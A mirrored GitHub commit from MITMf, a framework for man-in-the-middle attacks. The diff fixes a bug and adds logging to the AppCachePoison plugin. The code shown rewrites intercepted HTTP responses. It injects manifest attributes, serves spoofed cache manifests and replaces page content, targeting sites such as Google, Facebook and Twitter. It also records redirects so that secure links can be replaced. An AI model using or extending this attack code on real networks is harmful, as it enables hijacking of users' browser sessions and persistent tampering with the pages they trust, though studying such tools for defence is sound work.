mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
-Fixed bug in App Cache Poison plugin, missing function call resulted in some websites not loading
-Added output to the AppCachePoison plugin
This commit is contained in:
parent
aa2fa90642
commit
0c57f39671
5 changed files with 22 additions and 9 deletions
|
@ -5,7 +5,7 @@ Framework for Man-In-The-Middle attacks
|
||||||
|
|
||||||
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
|
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
|
||||||
|
|
||||||
This tool is completely based on sergio-proxy https://github.com/supernothing/sergio-proxy and is an attempt to revive and update the project.
|
This tool is based on sergio-proxy https://github.com/supernothing/sergio-proxy and is an attempt to revive and update the project.
|
||||||
|
|
||||||
**Before submitting issues please read the appropriate section.**
|
**Before submitting issues please read the appropriate section.**
|
||||||
|
|
||||||
|
|
|
@ -163,6 +163,10 @@
|
||||||
manifest_url=http://mail.google.com/robots.txt
|
manifest_url=http://mail.google.com/robots.txt
|
||||||
templates=default # could be omitted
|
templates=default # could be omitted
|
||||||
|
|
||||||
|
[[google]]
|
||||||
|
tamper_url = http://www.google.com/
|
||||||
|
manifest_url = http://www.google.com/robots.txt
|
||||||
|
|
||||||
[[facebook]]
|
[[facebook]]
|
||||||
tamper_url=http://www.facebook.com/
|
tamper_url=http://www.facebook.com/
|
||||||
manifest_url=http://www.facebook.com/robots.txt
|
manifest_url=http://www.facebook.com/robots.txt
|
||||||
|
@ -173,7 +177,7 @@
|
||||||
#tamper_url_match=^http://(www\.)?twitter\.com/$
|
#tamper_url_match=^http://(www\.)?twitter\.com/$
|
||||||
manifest_url=http://twitter.com/robots.txt
|
manifest_url=http://twitter.com/robots.txt
|
||||||
|
|
||||||
[[testing]]
|
[[html5rocks]]
|
||||||
tamper_url=http://www.html5rocks.com/en/
|
tamper_url=http://www.html5rocks.com/en/
|
||||||
manifest_url=http://www.html5rocks.com/robots.txt
|
manifest_url=http://www.html5rocks.com/robots.txt
|
||||||
|
|
||||||
|
|
|
@ -113,6 +113,7 @@ class ServerConnection(HTTPClient):
|
||||||
|
|
||||||
if (key.lower() == 'location'):
|
if (key.lower() == 'location'):
|
||||||
value = self.replaceSecureLinks(value)
|
value = self.replaceSecureLinks(value)
|
||||||
|
self.urlMonitor.addRedirection(self.client.uri, value)
|
||||||
|
|
||||||
if (key.lower() == 'content-type'):
|
if (key.lower() == 'content-type'):
|
||||||
if (value.find('image') != -1):
|
if (value.find('image') != -1):
|
||||||
|
|
|
@ -63,7 +63,9 @@ class URLMonitor:
|
||||||
if from_url in s:
|
if from_url in s:
|
||||||
s.add(to_url)
|
s.add(to_url)
|
||||||
return
|
return
|
||||||
self.redirects.append(set([from_url,to_url]))
|
url_set = set([from_url, to_url])
|
||||||
|
logging.debug("[URLMonitor] Set redirection: %s" % url_set)
|
||||||
|
self.redirects.append(url_set)
|
||||||
|
|
||||||
def getRedirectionSet(self, url):
|
def getRedirectionSet(self, url):
|
||||||
for s in self.redirects:
|
for s in self.redirects:
|
||||||
|
|
|
@ -38,20 +38,22 @@ class AppCachePlugin(Plugin):
|
||||||
if "enable_only_in_useragents" in self.config:
|
if "enable_only_in_useragents" in self.config:
|
||||||
regexp = self.config["enable_only_in_useragents"]
|
regexp = self.config["enable_only_in_useragents"]
|
||||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||||
logging.debug("Tampering disabled in this useragent (%s)" % (req_headers["user-agent"]))
|
logging.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
|
||||||
return {'request': request, 'data': data}
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
urls = self.urlMonitor.getRedirectionSet(url)
|
urls = self.urlMonitor.getRedirectionSet(url)
|
||||||
|
logging.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
|
||||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||||
|
|
||||||
if s is False:
|
if s is False:
|
||||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||||
return {'request': request, 'data': data}
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
logging.debug("Found URL %s in section %s" % (url, name))
|
logging.info("%s Found URL %s in section %s" % (ip, url, name))
|
||||||
p = self.getTemplatePrefix(s)
|
p = self.getTemplatePrefix(s)
|
||||||
|
|
||||||
if element == 'tamper':
|
if element == 'tamper':
|
||||||
logging.debug("Poisoning tamper URL with template %s" % (p))
|
logging.info("%s Poisoning tamper URL with template %s" % (ip, p))
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
if os.path.exists(p + '.replace'): # replace whole content
|
||||||
f = open(p + '.replace','r')
|
f = open(p + '.replace','r')
|
||||||
data = self.decorate(f.read(), s)
|
data = self.decorate(f.read(), s)
|
||||||
|
@ -68,12 +70,12 @@ class AppCachePlugin(Plugin):
|
||||||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
||||||
|
|
||||||
elif element == "manifest":
|
elif element == "manifest":
|
||||||
logging.debug("Poisoning manifest URL")
|
logging.info("%s Poisoning manifest URL" % ip)
|
||||||
data = self.getSpoofedManifest(url, s)
|
data = self.getSpoofedManifest(url, s)
|
||||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
||||||
|
|
||||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
elif element == "raw": # raw resource to modify, it does not have to be html
|
||||||
logging.debug("Poisoning raw URL")
|
logging.info("%s Poisoning raw URL" % ip)
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
if os.path.exists(p + '.replace'): # replace whole content
|
||||||
f = open(p + '.replace','r')
|
f = open(p + '.replace','r')
|
||||||
data = self.decorate(f.read(), s)
|
data = self.decorate(f.read(), s)
|
||||||
|
@ -164,12 +166,16 @@ class AppCachePlugin(Plugin):
|
||||||
if isinstance(self.config[i], dict): #section
|
if isinstance(self.config[i], dict): #section
|
||||||
section = self.config[i]
|
section = self.config[i]
|
||||||
name = i
|
name = i
|
||||||
|
|
||||||
if section.get('tamper_url',False) == url:
|
if section.get('tamper_url',False) == url:
|
||||||
return (name, section, 'tamper',url)
|
return (name, section, 'tamper',url)
|
||||||
|
|
||||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
||||||
return (name, section, 'tamper',url)
|
return (name, section, 'tamper',url)
|
||||||
|
|
||||||
if section.get('manifest_url',False) == url:
|
if section.get('manifest_url',False) == url:
|
||||||
return (name, section, 'manifest',url)
|
return (name, section, 'manifest',url)
|
||||||
|
|
||||||
if section.get('raw_url',False) == url:
|
if section.get('raw_url',False) == url:
|
||||||
return (name, section, 'raw',url)
|
return (name, section, 'raw',url)
|
||||||
|
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue